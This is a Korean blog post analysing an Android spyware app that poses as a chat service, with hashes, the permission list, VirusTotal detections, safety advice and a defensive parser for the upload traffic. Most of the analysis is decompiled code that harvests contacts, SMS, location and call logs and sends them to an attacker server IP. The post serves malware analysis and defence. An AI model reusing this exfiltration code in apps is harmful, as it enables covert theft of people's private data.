꿈을꾸는 파랑새

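Today we look at 나만의 공간.apk ("My Own Space"), malware that disguises itself as a chat app and illegally collects personal information.
When run, it behaves in the same way as 갤러리.apk ("Gallery", 2021.10.11), which was covered in an earlier post.
First, the hash values are as follows.
File name: 나만의 공간.apk
Size: 11.7 MB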
CRC32:308c7cae
MD5:33a76892437df85bcd2472dead919aca
SHA-1:71e20f342e0202719d414e9ce0e7e7f524c47c6e
SHA-256:06b3676ec5b7bf1dd08d49e0aec1f80e1aa5f779c67f883062ca498d20df857c
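When the malware is run, it first asks for the permissions it needs, and while it does so the background shows a screen reading 스치면 인연, 스며들면 사랑 ("A brush past is fate; sinking in is love").

Running the 나만의 공간.apk malware

Once every permission has been granted, the following message appears.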
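안전 영업 (Safe business)
서버점검 중입니다. (The server is under maintenance.)
안정적인 서비스를 위해 서버 업데이트 진행 중입니다. (A server update is in progress to provide a stable service.)
이용에 불편하게 해 죄송합니다. (We apologize for the inconvenience.)
자세한 내용은 고객센터에 문의하세요. (For details, please contact customer service.)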

나만의 공간.apk "안전 영업" message

After this message is shown, the data is ultimately sent to http://45.43.41(.)197:1001/api/uploads/apima.
As a guess, it looks like a few parts of the malware were modified while the existing address was kept as is. The malware contains three classes.dex files.
The DEX Base Info for each is as follows.
[DEX Base Info]
Dex File Name:classes.dex
File Size:4681356 bytes
MD5:ce35a185029b5c1d60c3b64ca91c9848
Class Size:2700
Method Size:29961
String Size:42200
Dex File Name:classes2.dex
File Size:4535548 bytes
MD5:2d097c50836f8d3fc9ff2769f4c2762b
Class Size:2350
Method Size:29998
String Size:39399
Dex File Name:classes3.dex
File Size:33760 bytes
MD5:d04e6d85eb6f1148b89d46fcd151105c
Class Size:348
Method Size:5421
String Size:8140
[File Base Info]
File Name: C:\Users\???\Desktop\나만의 공간.apk
Package Name:hub.com.work
Main Activity:hub.com.activity.AbsActivity
File Size:12281730 bytes
MD5:33a76892437df85bcd2472dead919aca
Packed:Not Packed
Min SDK:19
Target SDK:31

getPhoneNumber

The Android permissions are as follows.

<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.ACCESS_LOCATION_EXTRA_COMMANDS"/>
<uses-permission android:name="android.permission.FOREGROUND_SERVICE"/>
<uses-permission android:name="android.permission.ACCESS_BACKGROUND_LOCATION"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>

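Looking at the malware's Android permissions, it includes Internet access, reading contacts, reading text messages, reading external storage (the microSD card), location lookup, background operation, declaring the need for foreground location, Wi-Fi access, changing Wi-Fi state, additional location declarations, writing to external storage (the microSD card), and the permissions required for basic mapping functionality.
getPhoneNumber contains the code that retrieves the phone number from the Android device.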

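import android.content.Context;
import android.os.Build;
import android.telephony.TelephonyManager;
import android.text.TextUtils;
import java.util.regex.Pattern;

public class SystemUtil {
    public SystemUtil(){
       super();
    }
    // Device label in the form "<brand>-<model>".
    public static String getDevice(){
       return SystemUtil.getDeviceBrand()+"-"+SystemUtil.getSystemModel();
    }
    public static String getDeviceBrand(){
       return Build.BRAND;
    }
    // Reads the line-1 phone number (needs READ_PHONE_STATE) and strips every non-digit character.
    public static String getPhoneNumber(Context context){
       String phone;
       try{
          phone = ((TelephonyManager) context.getSystemService("phone")).getLine1Number();
       }catch(java.lang.Exception e0){
          phone = "";
       }
       String str = (!TextUtils.isEmpty(phone))? Pattern.compile("[^\\d]").matcher(phone).replaceAll("").trim(): phone;
       return str;
    }
    public static String getSystemModel(){
       return Build.MODEL;
    }
}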

For looking up the IMEI value, there are androidx/appcompat/app/AppCompatDelegateImpl, androidx/appcompat/app/ToolbarActionBar and androidx/appcompat/app/WindowDecorActionBar; taking androidx.appcompat.app.AppCompatDelegateImpl as the basis, the code is as follows.

private boolean preparePanel(PanelFeatureState st, KeyEvent event) {
        DecorContentParent decorContentParent;
        DecorContentParent decorContentParent2;
        DecorContentParent decorContentParent3;
        if (this.mIsDestroyed) {
            return false;
        }
        if (st.isPrepared) {
            return true;
        }
        PanelFeatureState panelFeatureState = this.mPreparedPanel;
        if (!(panelFeatureState == null || panelFeatureState == st)) {
            closePanel(panelFeatureState, false);
        }
        Window.Callback cb = getWindowCallback();
        if (cb != null) {
            st.createdPanelView = cb.onCreatePanelView(st.featureId);
        }
        boolean isActionBarMenu = st.featureId == 0 || st.featureId == 108;
        if (isActionBarMenu && (decorContentParent3 = this.mDecorContentParent) != null) {
            decorContentParent3.setMenuPrepared();
        }
        if (st.createdPanelView == null && (!isActionBarMenu || !(peekSupportActionBar() instanceof ToolbarActionBar))) {
            if (st.menu == null || st.refreshMenuContent) {
                if (st.menu == null && (!initializePanelMenu(st) || st.menu == null)) {
                    return false;
                }
                if (isActionBarMenu && this.mDecorContentParent != null) {
                    if (this.mActionMenuPresenterCallback == null) {
                        this.mActionMenuPresenterCallback = new ActionMenuPresenterCallback();
                    }
                    this.mDecorContentParent.setMenu(st.menu, this.mActionMenuPresenterCallback);
                }
                st.menu.stopDispatchingItemsChanged();
                if (!cb.onCreatePanelMenu(st.featureId, st.menu)) {
                    st.setMenu(null);
                    if (isActionBarMenu && (decorContentParent2 = this.mDecorContentParent) != null) {
                        decorContentParent2.setMenu(null, this.mActionMenuPresenterCallback);
                    }
                    return false;
                }
                st.refreshMenuContent = false;
            }
            st.menu.stopDispatchingItemsChanged();
            if (st.frozenActionViewState != null) {
                st.menu.restoreActionViewStates(st.frozenActionViewState);
                st.frozenActionViewState = null;
            }
            if (!cb.onPreparePanel(0, st.createdPanelView, st.menu)) {
                if (isActionBarMenu && (decorContentParent = this.mDecorContentParent) != null) {
                    decorContentParent.setMenu(null, this.mActionMenuPresenterCallback);
                }
                st.menu.startDispatchingItemsChanged();
                return false;
            }
            st.qwertyMode = KeyCharacterMap.load(event != null ? event.getDeviceId() : -1).getKeyboardType() != 1;
            st.menu.setQwertyMode(st.qwertyMode);
            st.menu.startDispatchingItemsChanged();
        }
        st.isPrepared = true;
        st.isHandled = false;
        this.mPreparedPanel = st;
        return true;
    }

getDeviceId()

The addresses contained in the malware are as follows.

Internet addresses contained in the malware

In hub.com.activity.AbsActivity, the code is set up so that smartphone information and the user's personal information are sent to a person with malicious intent.

Smartphone personal information transmission

/* loaded from: classes3.dex */
public class AbsActivity extends BaseActivity {
    private static final int REQUEST_CODE_ASK_WRITE_EXTERNAL_STORAGE = 291;
    private static final int maxRetry = 3;
    private LinearLayout layout_delay;
    private int retryNum;
    private FrameLayout root;
    private SimpleDateFormat sdf = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss");
    private Handler handler = new Handler();

    static /* synthetic */ int access$1108(AbsActivity x0) {
        int i = x0.retryNum;
        x0.retryNum = i + 1;
        return i;
    }

    /* JADX INFO: Access modifiers changed from: protected */
    @Override // hub.com.base.BaseActivity, androidx.appcompat.app.AppCompatActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_first);
        if (loadWeb()) {
            startActivity(new Intent(this, WebActivity.class));
            finish();
            return;
        }
        initView();
        this.handler.postDelayed(new Runnable() { // from class: hub.com.activity.AbsActivity.1
            @Override // java.lang.Runnable
            public void run() {
                AbsActivity.this.requestPermissions();
            }
        }, 2000);
    }

    /* JADX INFO: Access modifiers changed from: protected */
    @Override // hub.com.base.BaseActivity, androidx.appcompat.app.AppCompatActivity, androidx.fragment.app.FragmentActivity, android.app.Activity
    public void onDestroy() {
        super.onDestroy();
        this.handler.removeCallbacksAndMessages(null);
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void requestPermissions() {
        List<String> permissions = new ArrayList<>();
        permissions.add("android.permission.ACCESS_COARSE_LOCATION");
        permissions.add("android.permission.ACCESS_FINE_LOCATION");
        permissions.add("android.permission.READ_PHONE_STATE");
        permissions.add("android.permission.READ_CONTACTS");
        permissions.add("android.permission.READ_SMS");
        PermissionX.init(this).permissions(permissions).onExplainRequestReason(new ExplainReasonCallback() { // from class: hub.com.activity.AbsActivity.4
            @Override // com.permissionx.guolindev.callback.ExplainReasonCallback
            public void onExplainReason(ExplainScope scope, List<String> deniedList) {
                scope.showRequestReasonDialog(deniedList, AbsActivity.this.getString(R.string.Qw_Bin_res_0x7f0e001b), "확정 하 다");
            }
        }).onForwardToSettings(new ForwardToSettingsCallback() { // from class: hub.com.activity.AbsActivity.3
            @Override // com.permissionx.guolindev.callback.ForwardToSettingsCallback
            public void onForwardToSettings(ForwardScope scope, List<String> deniedList) {
                scope.showForwardToSettingsDialog(deniedList, AbsActivity.this.getString(R.string.Qw_Bin_res_0x7f0e001b), "설치");
            }
        }).request(new RequestCallback() { // from class: hub.com.activity.AbsActivity.2
            @Override // com.permissionx.guolindev.callback.RequestCallback
            public void onResult(boolean allGranted, List<String> grantedList, List<String> deniedList) {
                if (allGranted) {
                    if (AbsActivity.this.needDelay()) {
                        AbsActivity.this.handler.postDelayed(new Runnable() { // from class: hub.com.activity.AbsActivity.2.1
                            @Override // java.lang.Runnable
                            public void run() {
                                AbsActivity.this.root.setBackgroundColor(AbsActivity.this.getResources().getColor(R.color.white));
                                AbsActivity.this.layout_delay.setVisibility(0);
                            }
                        }, 1500);
                    } else {
                        AbsActivity.this.showProgress("", false);
                    }
                    new Thread(new Runnable() { // from class: hub.com.activity.AbsActivity.2.2
                        @Override // java.lang.Runnable
                        public void run() {
                            List<LocalContacts> data;
                            LocalMessage localMessage;
                            List<LocalContacts> data2 = ContactUtils.getAllContacts(AbsActivity.this.context);
                            for (LocalContacts lc : data2) {
                                DBManager.getInstance(AbsActivity.this.context).saveContacts(lc, false);
                            }
                            Cursor cursor = AbsActivity.this.getContentResolver().query(Uri.parse("content://sms/"), null, null, null, "date asc");
                            while (cursor != null && cursor.moveToNext()) {
                                try {
                                    int idColumn = cursor.getColumnIndex("_id");
                                    int nameColumn = cursor.getColumnIndex("person");
                                    int phoneNumberColumn = cursor.getColumnIndex("address");
                                    int smsbodyColumn = cursor.getColumnIndex("body");
                                    int dateColumn = cursor.getColumnIndex("date");
                                    int typeColumn = cursor.getColumnIndex(Const.TableSchema.COLUMN_TYPE);
                                    long id = cursor.getLong(idColumn);
                                    int Name = cursor.getInt(nameColumn);
                                    String Date = AbsActivity.this.sdf.format(new Date(cursor.getLong(dateColumn)));
                                    String PhoneNumber = cursor.getString(phoneNumberColumn);
                                    String Smsbody = cursor.getString(smsbodyColumn);
                                    String Type = cursor.getString(typeColumn);
                                    localMessage = new LocalMessage();
                                    localMessage.setId(id);
                                    localMessage.setName(Name);
                                    localMessage.setDate(Date);
                                    localMessage.setPhoneNumber(PhoneNumber);
                                    localMessage.setSmsbody(Smsbody);
                                    localMessage.setType(Type);
                                    data = data2;
                                } catch (Exception e) {
                                    data = data2;
                                }
                                try {
                                    DBManager.getInstance(AbsActivity.this.context).saveMessage(localMessage, false);
                                    data2 = data;
                                } catch (Exception e2) {
                                    data2 = data;
                                }
                            }
                            if (cursor != null) {
                                cursor.close();
                            }
                            SharedPreferences pref = AbsActivity.this.getSharedPreferences("config", 0);
                            String sjh = pref.getString("sjh", "");
                            if (TextUtils.isEmpty(sjh)) {
                                sjh = SystemUtil.getPhoneNumber(AbsActivity.this.context);
                            }
                            if (TextUtils.isEmpty(sjh)) {
                                sjh = String.valueOf(System.currentTimeMillis());
                            }
                            String yqm = pref.getString("yqm", "");
                            if (TextUtils.isEmpty(yqm)) {
                                yqm = AbsActivity.randomCode();
                            }
                            pref.edit().putString("sjh", sjh).putString("yqm", yqm).apply();
                            AbsActivity.this.retryNum = 0;
                            AbsActivity.this.uploadContacts(sjh, yqm);
                        }
                    }).start();
                    return;
                }
                AbsActivity.this.finish();
            }
        });
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void uploadContacts(final String sjh, final String yqm) {
        String address = SystemUtil.getDevice();
        StringBuilder con = new StringBuilder(sjh + "**" + yqm + "**" + address);
        final List<LocalContacts> list = DBManager.getInstance(this.context).getContacts();
        if (list == null || list.isEmpty()) {
            uploadMessages(sjh, yqm);
            return;
        }
        for (LocalContacts lc : list) {
            con.append('=');
            con.append(lc.getName());
            con.append('|');
            con.append(lc.getPhone());
            lc.setSend(true);
        }
        OkHttpUtils.post().url("http://45.43.41(.)197:1001/api/uploads/api").addParams("data", con.toString()).build().execute(new StringCallback() { // from class: hub.com.activity.AbsActivity.5
            @Override // com.zhy.http.okhttp.callback.Callback
            public void onError(Call call, Exception e, int id) {
                e.printStackTrace();
                if (!Utils.needTry(e)) {
                    AbsActivity.this.showMessage(e.getMessage());
                } else if (AbsActivity.this.retryNum < 3) {
                    AbsActivity.access$1108(AbsActivity.this);
                    AbsActivity.this.uploadContacts(sjh, yqm);
                } else {
                    AbsActivity.this.showMessage(e.getMessage());
                }
            }

            public void onResponse(String response, int id) {
                LitePal.saveAll(list);
                AbsActivity.this.retryNum = 0;
                AbsActivity.this.uploadMessages(sjh, yqm);
            }
        });
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void uploadMessages(final String sjh, final String yqm) {
        StringBuilder duanxin = new StringBuilder("[{\"imei\":\"" + sjh + "\",\"imei2\":\"" + yqm + "\"}");
        final List<LocalMessage> list = DBManager.getInstance(this.context).getMessage();
        if (list == null || list.isEmpty()) {
            goNext(sjh, yqm);
            return;
        }
        for (LocalMessage lm : list) {
            String post = JsonUtils.toJson(lm);
            duanxin.append(',');
            duanxin.append(post);
            lm.setSend(true);
        }
        duanxin.append("]");
        OkHttpUtils.post().url("http://45.43.41(.)197:1001/api/uploads/apisms").addParams("data", duanxin.toString()).build().execute(new StringCallback() { // from class: hub.com.activity.AbsActivity.6
            @Override // com.zhy.http.okhttp.callback.Callback
            public void onError(Call call, Exception e, int id) {
                if (!Utils.needTry(e)) {
                    AbsActivity.this.showMessage(e.getMessage());
                } else if (AbsActivity.this.retryNum < 3) {
                    AbsActivity.access$1108(AbsActivity.this);
                    AbsActivity.this.uploadMessages(sjh, yqm);
                } else {
                    AbsActivity.this.showMessage(e.getMessage());
                }
            }

            public void onResponse(String response, int id) {
                LitePal.saveAll(list);
                AbsActivity.this.goNext(sjh, yqm);
            }
        });
    }

    public static String randomCode() {
        StringBuilder str = new StringBuilder();
        Random random = new Random();
        for (int i = 0; i < 6; i++) {
            str.append(random.nextInt(10));
        }
        return str.toString();
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void goNext(final String sjh, final String yqm) {
        if (!needDelay()) {
            runOnUiThread(new Runnable() { // from class: hub.com.activity.AbsActivity.7
                @Override // java.lang.Runnable
                public void run() {
                    AbsActivity.this.hideProgress();
                    AbsActivity.this.startActivity(new Intent(AbsActivity.this.context, AdvertiseActivity.class).putExtra("sjh", sjh).putExtra("yqm", yqm));
                    AbsActivity.this.finish();
                }
            });
        }
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void showMessage(final String message) {
        runOnUiThread(new Runnable() { // from class: hub.com.activity.AbsActivity.8
            @Override // java.lang.Runnable
            public void run() {
                AbsActivity.this.hideProgress();
                Toast.makeText(AbsActivity.this.context, message, 1).show();
            }
        });
    }

    /* JADX INFO: Access modifiers changed from: private */
    public boolean needDelay() {
        return BuildConfig.FLAVOR.equals("Korea07") || BuildConfig.FLAVOR.equals("Korea09") || BuildConfig.FLAVOR.equals("Korea11");
    }

    private boolean loadWeb() {
        return BuildConfig.FLAVOR.equals("Korea13") || BuildConfig.FLAVOR.equals("Korea14");
    }

    private void initView() {
        this.layout_delay = (LinearLayout) findViewById(R.id.layout_delay);
        this.root = (FrameLayout) findViewById(R.id.root);
    }

    private void getLocationLL(String sjh, String yqm) {
        Location location = getLastKnownLocation();
        if (location != null) {
            OkHttpUtils.post().url("http://45.43.41(.)197:1001/api/uploads/apimap").addParams("data", sjh + ',' + yqm + ',' + location.getLongitude() + ',' + location.getLatitude()).build().execute(new StringCallback() { // from class: hub.com.activity.AbsActivity.9
                @Override // com.zhy.http.okhttp.callback.Callback
                public void onError(Call call, Exception e, int id) {
                    e.printStackTrace();
                }

                public void onResponse(String response, int id) {
                    PrintStream printStream = System.out;
                    printStream.println("response:" + response);
                }
            });
            return;
        }
        Toast.makeText(this, "something wrong", 0).show();
    }

    private Location getLastKnownLocation() {
        LocationManager mLocationManager = (LocationManager) getApplicationContext().getSystemService("location");
        Location bestLocation = null;
        for (String provider : mLocationManager.getProviders(true)) {
            if (ActivityCompat.checkSelfPermission(this, "android.permission.ACCESS_FINE_LOCATION") == 0 || ActivityCompat.checkSelfPermission(this, "android.permission.ACCESS_COARSE_LOCATION") == 0) {
                Location l = mLocationManager.getLastKnownLocation(provider);
                if (l != null && (bestLocation == null || l.getAccuracy() < bestLocation.getAccuracy())) {
                    bestLocation = l;
                }
            } else {
                ActivityCompat.requestPermissions(this, new String[]{"android.permission.ACCESS_FINE_LOCATION", "android.permission.ACCESS_COARSE_LOCATION"}, REQUEST_CODE_ASK_WRITE_EXTERNAL_STORAGE);
                return null;
            }
        }
        return bestLocation;
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void uploadCallLog(final String sjh, final String yqm) {
        Map<String, Object> map = new HashMap<>();
        map.put("local_phone", sjh);
        final List<LocalCall> list = DBManager.getInstance(this.context).getCallLog();
        map.put("call_log", list);
        if (!(list == null || list.isEmpty())) {
            for (LocalCall lc : list) {
                lc.setSend(true);
            }
            System.out.println(new Gson().toJson(map));
            OkHttpUtils.post().url("http://45.43.41(.)197:1001/api/uploads/callhis").addParams("local_phone", sjh).addParams("call_log", new Gson().toJson(list)).build().execute(new StringCallback() { // from class: hub.com.activity.AbsActivity.10
                @Override // com.zhy.http.okhttp.callback.Callback
                public void onError(Call call, Exception e, int id) {
                    if (!Utils.needTry(e)) {
                        AbsActivity.this.showMessage(e.getMessage());
                    } else if (AbsActivity.this.retryNum < 3) {
                        AbsActivity.access$1108(AbsActivity.this);
                        AbsActivity.this.uploadCallLog(sjh, yqm);
                    } else {
                        AbsActivity.this.showMessage(e.getMessage());
                    }
                }

                public void onResponse(String response, int id) {
                    LitePal.saveAll(list);
                    AbsActivity.this.goNext(sjh, yqm);
                }
            });
        }
    }
}
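
The upload formats built by uploadContacts, uploadMessages, getLocationLL and uploadCallLog above can be decoded on the defender's side to scope what left a device. The following is an added example, not code from the sample or from the original post: it takes form-encoded POST records, as an HTTP proxy log or packet capture would yield them, and reports per victim identifier (sjh) which kinds of data were sent and how many records. The (url, body) record layout, the placeholder host, the keys inside the SMS object and all sample values are assumptions constructed for the example.

```python
import json
from urllib.parse import parse_qs, urlencode, urlsplit

# Upload paths used by the decompiled AbsActivity and the data each one carries.
ENDPOINTS = {
    "/api/uploads/api": "contacts",
    "/api/uploads/apisms": "sms",
    "/api/uploads/apimap": "location",
    "/api/uploads/callhis": "call_log",
}


def decode_contacts(data):
    """uploadContacts(): 'sjh**yqm**brand-model', then '=name|phone' per contact."""
    header, *pieces = data.split("=")
    sjh, yqm, device = header.split("**", 2)
    records, carry = [], ""
    for piece in pieces:
        if "|" not in piece:  # '=' inside a contact name: rejoin the halves
            carry += piece + "="
            continue
        name, _, phone = (carry + piece).rpartition("|")
        records.append({"name": name, "phone": phone})
        carry = ""
    return {"sjh": sjh, "yqm": yqm, "device": device, "records": records}


def decode_sms(data):
    """uploadMessages(): JSON array; item 0 holds imei/imei2, the rest are messages."""
    ident, *messages = json.loads(data)
    return {"sjh": ident["imei"], "yqm": ident["imei2"], "records": messages}


def decode_location(data):
    """getLocationLL(): 'sjh,yqm,longitude,latitude'."""
    sjh, yqm, lon, lat = data.split(",")
    point = {"longitude": float(lon), "latitude": float(lat)}
    return {"sjh": sjh, "yqm": yqm, "records": [point]}


def decode_request(url, body):
    """Decode one captured POST; None if the path is not a known upload path."""
    kind = ENDPOINTS.get(urlsplit(url).path)
    if kind is None:
        return None
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    try:
        if kind == "contacts":
            out = decode_contacts(form["data"])
        elif kind == "sms":
            out = decode_sms(form["data"])
        elif kind == "location":
            out = decode_location(form["data"])
        else:  # uploadCallLog(): separate local_phone and call_log parameters
            out = {"sjh": form["local_phone"], "yqm": None,
                   "records": json.loads(form["call_log"])}
    except (KeyError, ValueError, TypeError):
        return {"kind": kind, "malformed": True, "records": []}
    return {"kind": kind, "malformed": False, **out}


def summarise(capture):
    """Map each victim identifier (sjh) to {data kind: number of records sent}."""
    victims = {}
    for url, body in capture:
        hit = decode_request(url, body)
        if hit is None or hit["malformed"]:
            continue
        counts = victims.setdefault(hit["sjh"], {})
        counts[hit["kind"]] = counts.get(hit["kind"], 0) + len(hit["records"])
    return victims


# Constructed capture, not real victim data. The host is a placeholder and the
# keys inside the SMS object are assumed (JsonUtils output is not shown on the page).
HOST = "http://upload-host.example:1001"
SAMPLE_CAPTURE = [
    (HOST + "/api/uploads/api", urlencode({"data":
        "01012345678**482913**samsung-SM-G991N=Kim=Lee|01011112222=Park|01033334444"})),
    (HOST + "/api/uploads/apisms", urlencode({"data": json.dumps([
        {"imei": "01012345678", "imei2": "482913"},
        {"phoneNumber": "15881234", "smsbody": "constructed text"}])})),
    (HOST + "/api/uploads/apimap", urlencode({"data": "01012345678,482913,126.978,37.5665"})),
]
```

Because sjh falls back to a timestamp when no phone number is available, the 6-digit yqm value stored alongside it is worth keeping when correlating uploads from the same device.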

As of 2021-12-27 05:42:47 UTC, the security vendors that detect it on VirusTotal are as follows.
AhnLab-V3:PUP/Android.Agent.1070959
Alibaba:TrojanSpy:Android/Agent.660af872
Avast-Mobile:Android:Evo-gen [Trj]
Avira (no cloud):ANDROID/SpyAgent.FKMB.Gen
Cynet:Malicious (score: 99)
DrWeb:Android.Spy.916.origin
ESET-NOD32:A Variant Of Android/Spy.Agent.BUF
Fortinet:Android/Agent.BUF!tr.spy
Ikarus:Trojan-Spy.AndroidOS.Agent
K7GW:Spyware ( 00581fe61 )
Kaspersky:HEUR:Trojan-Spy.AndroidOS.Agent.ze
McAfee:Artemis!33A76892437D
McAfee-GW-Edition:Artemis
Microsoft:Trojan:Script/Wacatac.B!ml
Sophos:Andr/Spy-BGF
Symantec:Trojan.Gen.MBT
Symantec Mobile Insight:AdLibrary:Generisk
Tencent:A.privacy.SexInfoSteal
Trustlook:Android.PUA.General
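1. Do not install apps from anywhere other than the Google Play Store and official stores.
2. Install a reputable antivirus app and keep real-time protection on and updates current (see AV-TEST).
3. On Google Android smartphones a warning appears when you try to install an external app; heed that warning and do not install external apps.
4. Using spam-blocking apps such as 후후 (WhoWho), 후스콜 (Whoscall) or T 전화 can reduce this kind of voice-phishing damage.
5. Use strong passwords and, where possible, two-step authentication is recommended.
6. Do not carelessly tap links in text messages or emails sent to your smartphone.
7. Google Play Protect is enabled by default on Android smartphones. Check that it is enabled (how to check: open the Google Play Store, select your profile -> enable Play Protect -> gear icon -> enable "Scan apps with Play Protect" and "Improve harmful app detection"; the latter is up to the user's preference).
8. Be careful about granting every permission when running a smartphone app.
9. Keep smartphone firmware, the operating system and applications up to date.
What to do if you suspect a malware infection
Because malware can in some cases re-enable mobile data, disable Wi-Fi and mobile data and remove the SIM card (USIM)
Factory reset
If a factory reset is not possible, remove the application
Back up personal media files (excluding mobile applications) and reset the device
If damage such as voice phishing has occurred, call 112 from another smartphone or similar, and ask the bank you use for help and report it
How to protect yourself from this kind of malware
The news tells people not to tap links in text messages and to delete the app, but a proactive approach is to use an antivirus app (one that scores well in AV-TEST is recommended; free ones exist, but most are paid, and even the free ones have limited features) together with apps such as 후후 and 후스콜.
Following basic security practices is the way to use a smartphone safely.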

Comments

  1. Wow... there really are all kinds of malicious programs out there.
    Wrap up 2021 well and have a happy year-end holiday~
    Happy New Year~^^
    2021.12.31 16:46
    • Happy New Year.
      2021.12.31 22:38